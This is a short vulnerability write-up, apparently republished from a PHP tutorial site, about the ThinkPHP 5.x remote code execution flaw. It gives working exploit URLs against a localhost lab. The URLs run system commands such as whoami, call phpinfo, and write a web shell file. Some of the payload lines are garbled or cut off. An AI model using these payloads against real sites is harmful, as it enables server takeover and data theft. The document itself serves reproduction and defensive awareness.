thinkphp remote command execution vulnerability

Vulnerability Overview

ThinkPHP is a popular open source PHP framework in China. It was recently revealed that there is a possible remote code execution vulnerability. The attacker PHP code can be written to the cache file, leading to remote code execution.

Although the exploitation of this vulnerability requires several prerequisites, given the large number of domestic sites that use the ThinkPHP framework, this vulnerability still has a certain scope of impact. Because the framework does not perform enough detection on the controller name, it may lead to a possible getshell vulnerability when forced routing is not turned on.

Hazards of the vulnerability

An attacker can use this vulnerability to gain control of the website and modify the page, leading to data leakage and other problems.

Affected versions

5.x

Reproduction environment

thinkphp5.1 phpstudy integrated environment (php5.6n apache mysql)

Reproduction process

1. First set up the environment as shown in the figure

2. Use the system function to execute remote commands:

http://localhost/thinkphp5.1/html/public/index.php ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

3. Write phpinfo through the phpinfo function () Information:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=1

4. Write shell:

http://localhost/thinkphp5.1/html /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >shell.php

or

http://localhost/thinkphp5.1/html/public/index.php? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

Recommended tutorial: "TP5"

The above is the detailed content of thinkphp remote command execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!